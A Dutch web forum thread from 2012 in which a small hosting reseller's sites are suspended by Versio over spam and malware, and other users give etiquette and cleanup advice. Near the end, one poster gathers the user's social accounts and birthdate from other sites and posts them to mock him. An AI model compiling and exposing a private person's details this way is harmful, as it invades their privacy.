ik ben het allemaal aan het uitvogelen en ik denk dat ik overga naar HTML met strakke restricties en met externe plaatjes upload zodat het geen kwaad kan intern maar ik zoek nog verder om wijzer te worden :)!!!

[ Voor 255% gewijzigd door kiko015 op 02-04-2012 10:47 ]


Acties:
  • 0 Henk 'm!

  • Poekie McPurrr
  • Registratie: November 2004
  • Laatst online: 11:52

Poekie McPurrr

Mreoww~

1 tip voor de toekomst, mocht je nog eens een helpdesk nodig hebben: Blijf wat je probleem of hoe hoog je frustratie/woede ook is beleefd. Je mag gerust zeggen dat je het niet eens bent met het antwoord of dat je boos bent, hou het wel beschaafd. Zeker als je een "kleinere" klant bent heeft het een averechts effect als je je onbeleefd gedraagt jegens de helpdeskmedewerker, blijf beleefd naar die medewerker toe en je bereikt veel meer. Ben onbeleefd en de kans is groot dat jij na het gesprek nog steeds met je probleem zit en de helpdeskmedewerker is over het algemeen getraind genoeg om het vervelende gesprek van zich af te schudden en bij de volgende klant weer vrolijk goedemorgen/middag/avond te zeggen..
Een absolute no-no is trouwens meteen zeggen dat je veel ervaring hebt, je schoffeert daarmee de helpdeskmedewerker die op dat moment enkel probeert het probleem te analyseren om zodoende tot een correcte oplossing te komen.

(en ja, helaas zijn er ook helpdeskmedewerkers die wel eens opnieuw op training mogen om het idee van klantvriendelijkheid nieuw leven in te blazen)

In elk geval, veel succes! :)

Le Meow


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
-

[ Voor 99% gewijzigd door kiko015 op 03-04-2012 13:03 ]


Acties:
  • 0 Henk 'm!

  • Aghanim
  • Registratie: Januari 2002
  • Niet online
Waar rook is....

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
jah sorry ik word helemaal gek :(!! heb aangegeven dat ik het ga oplossen en hun zetten alles terug online maar hun verwachten binnen 1 dag dat alles virus en spam vrij is :S!! ze hebben meerdere malen me site offline gegooid en dan zeggen dat die offline stond zonder reden!! ik kan het niet meer volgen!.

Acties:
  • 0 Henk 'm!

  • Mr. Awesome
  • Registratie: Januari 2006
  • Laatst online: 26-08 18:34

Mr. Awesome

Vroeger hyptonize

kiko015 schreef op dinsdag 03 april 2012 @ 12:02:
jah sorry ik word helemaal gek :(!! heb aangegeven dat ik het ga oplossen en hun zetten alles terug online maar hun verwachten binnen 1 dag dat alles virus en spam vrij is :S!! ze hebben meerdere malen me site offline gegooid en dan zeggen dat die offline stond zonder reden!! ik kan het niet meer volgen!.
Wij jou ook niet. De helpdeskmedewerker geeft al meerdere keren aan dat er voor jouw problemen geen telefoonnummer beschikbaar is. Het beste is dan om, in correct en helder Nederlands, jouw probleem uit te leggen in een mail. Versio zal vast wel een policy hebben dat ze binnen xx uur reageren. ;)

Acties:
  • 0 Henk 'm!

  • Kwastie
  • Registratie: April 2005
  • Laatst online: 17-09 13:58

Kwastie

Awesomeness

Ik vindt het bijzonder onprofessioneel dat jij alweer chat gesprekken publiek plaatst, daarnaast reageer jij ook nog eens bijzonder onprofessioneel in dit gesprek. (Jij als "bedrijf")

Het standpunt van Versio is helemaal niet vreemd, ze hebben overlast van jouw websites. (Het versturen van o.a. spam)

Wat jij had moeten doen nadat Versio alles weer online had gezet:
- Alle websites offline halen.
- Software upgraden
- 1-voor-1 alle websites controleren op 'virussen' voordat je ze weer online zet.

[ Voor 5% gewijzigd door Kwastie op 03-04-2012 12:14 ]

When I get sad i stop being sad and be awesome instead


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Ik begrijp jullie volkomen, alleen heeft versio niet alle site's weer online gezet, en daarnaast ook websites online gezet als ik ze offline haalde en andersom .. alsof ze ermee aan het spelen waren.. ik heb ze toen ook gemaild en was inderdaad binnen x uur online en daarna had ik zelf offline gezet.. mijn nicht de fotoalbum had geen 777 rechten die stond online en mijn site zelf.. maar die had honderde errors ineens.. flash onderdelen en fotoalbum werkten niet, heb het een paar x overnieuw geconfigureerd op de goeie manier maar het deed nog steeds niks,.. de andere 2 site's waren offline.

ff op volgorde
Fotoalbum online zonder gast rechten ( Prive )
Eigen site wat voor de helft fouten bevat.. voor deze dingen waren er geen problemen met de site
Klanten site's offline vanwege verspreiding van spam
Webanalyzer in de gaten gehouden met in out mail in 0 out 0
Bandwith in 0 out 0
En natuurlijk paar x refreshed en toen geprobeerd te beginnen met uitvogelen.

Ik heb hierbij ook de chat verwijdert ( ik probeer jullie tips te gebruiken. )
( alle software was geupgrade naar laaste versie )

Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Welke foutmeldingen krijgen? Welke rechten heb je?

Met "foutmeldingen" en "doet niet" kunnen wij hier ook niks.

Een fotoalbum zonder gastrechten, wat versta je daar onder? Doel je nu op rechten die je hebt toegepast via chmod of dat het album niet publiekelijk via internet te bereiken was voor andere IP's dan die van jouw/nicht?

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Alles is offline versio is niet van plan om het online te zetten.

verder weet ik nu ook niks.

Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Dan zou ik maar eens met Versio proberen te overleggen om te site(s) terug online te brengen en ze dan alleen toegankelijk te maken voor jouw IP-adres zodat je wijzigingen (updates) door kunt voeren.

Zoek bijvoorbeeld via php op bestanden die de laatste tijd zijn gewijzigd, dan kun je de geïnfecteerde bestanden misschien boven water halen.

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
dank je wel zal ik proberen!.

Acties:
  • 0 Henk 'm!

  • NMe
  • Registratie: Februari 2004
  • Laatst online: 09-09 13:58

NMe

Quia Ego Sic Dico.

Je zoekt helemaal geen geïnfecteerde bestanden, je zoekt beveiligingslekken.

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.


Acties:
  • 0 Henk 'm!

  • iisschots
  • Registratie: November 2002
  • Laatst online: 17-09 10:35
Je hebt nu een groot aantal tips gekregen om het aan te pakken. Mocht je na aanleiding van dit nog vragen hebben geef dan aan wat je zelf geprobeerd hebt en waarop je gezocht hebt. Geef ook vooral aan waarom jij denkt dat het niet werkt.

Dan hebben andere gebruikers meer een idee wat er aan de hand is en kunnen ze je ook beter helpen.

Hackerspace in Friesland | www.frack.nl | Bezig met opzetten, help mee!


Acties:
  • 0 Henk 'm!

  • Alfa Novanta
  • Registratie: Oktober 2001
  • Laatst online: 17-09 21:05

Alfa Novanta

VRRROOOAAARRRP

Afbeeldingslocatie: http://www.alfa90.nl/overig/got/JS_Kryptik.KF_Trojan.png

edit: tot op heden nog weinig over gevonden.

http://hp-virusradar-s.es...3/virus_10_month_enu.html

Afbeeldingslocatie: http://hp-virusradar-s.eset.com/stat_02_months/2012-03/virus_10_month_enu.png

een scan via http://vscan.novirusthanks.org leverde op ..

bron: http://vscan.novirusthank...235b07856387360/YmxvZw==/
Afbeeldingslocatie: http://www.alfa90.nl/overig/got/vscan.novirusthanks.org.PNG

topic even verder doorgelezen ..
ItsValium schreef op vrijdag 30 maart 2012 @ 10:13:
kiko015 no offence maar jij lijkt me het type voorbeeld van een 'zolderkamerhoster'. Ergens een goedkoop reseller pakketje huren en dan doorverkopen aan klanten terwijl je amper de kennis hebt om een wordpress site te onderhouden?

Bij het minste die misloopt de schuld/oorzaak ergens anders zoeken terwijl het toch sterk in de richting van eigen onkunde lijkt te liggen.

Wil je er serieus mee verder, lees je dan eens in in allerhande artikelen over het beveiligen van webservers, en onderhoud sowieso je pakketjes die je gebruikt. Wordpress brengt niet voor niets updates uit net als alle andere beschikbare pakketen. Wil je de kans verkleinen, maak het dan zelf op voorwaarde dat je goed weet hoe je security en gerelateerde zaken moet aanpakken.

En zoals al gezegd ivm Versio : pay peanuts, get monkeys! Dat is in de hosting wereld zeker een feit.
^ met stom

dit is je twitter?

http://twitter.com/#!/kiko015

:X
Bron: http://www.hiphopi.nl/profiel/621-kiko015.htmx
Geboortedatum: 1990-09-10
welcome to the real world :w


Je gebruikt Wordpress lees ik? Zoek het eens in gratis themes ... O-)

[ Voor 146% gewijzigd door Alfa Novanta op 05-04-2012 23:11 ]

My Youtube channel: Alfa Novanta
AMD Ryzen 7 5800X | ASRock X470 Taichi | 32GB Kingston HyperX Predator DDR4-3200 RGB | Gigabyte RTX3090 Gaming OC 24GB GDDR6 | Windows 10 x64 | HP Reverb G2

Pagina: 1